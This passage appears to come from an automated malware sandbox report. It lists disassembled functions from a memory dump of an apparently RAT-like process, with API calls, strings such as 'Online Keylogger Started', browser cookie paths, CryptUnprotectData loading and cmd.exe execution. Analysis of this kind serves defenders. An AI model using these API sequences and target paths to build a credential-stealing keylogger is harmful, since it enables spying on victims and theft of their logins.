                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63771986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32 ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$okmode$PG
                                • API String ID: 3411444782-3370592832
                                • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                • API String ID: 1497725170-1359877963
                                • Opcode ID: d3067f7dc3e5f538a631bdb1baca68ba82ac4dff48b355963c3d2e2bd7d7ef1d
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: d3067f7dc3e5f538a631bdb1baca68ba82ac4dff48b355963c3d2e2bd7d7ef1d
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                • RegSetValueExW.ADVAPI32 ref: 0041384D
                                • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                • ShowWindow.USER32(00000009), ref: 00416C61
                                • SetForegroundWindow.USER32 ref: 00416C6D
                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                • String ID: !D@
                                • API String ID: 3446828153-604454484
                                • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: TerminateThread$HookUnhookWindows
                                • String ID: pth_unenc
                                • API String ID: 3123878439-4028850238
                                • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: GetCursorInfo$User32.dll
                                • API String ID: 1646373207-2714051624
                                • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetLastInputInfo$User32.dll
                                • API String ID: 2574300362-1519888992
                                • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
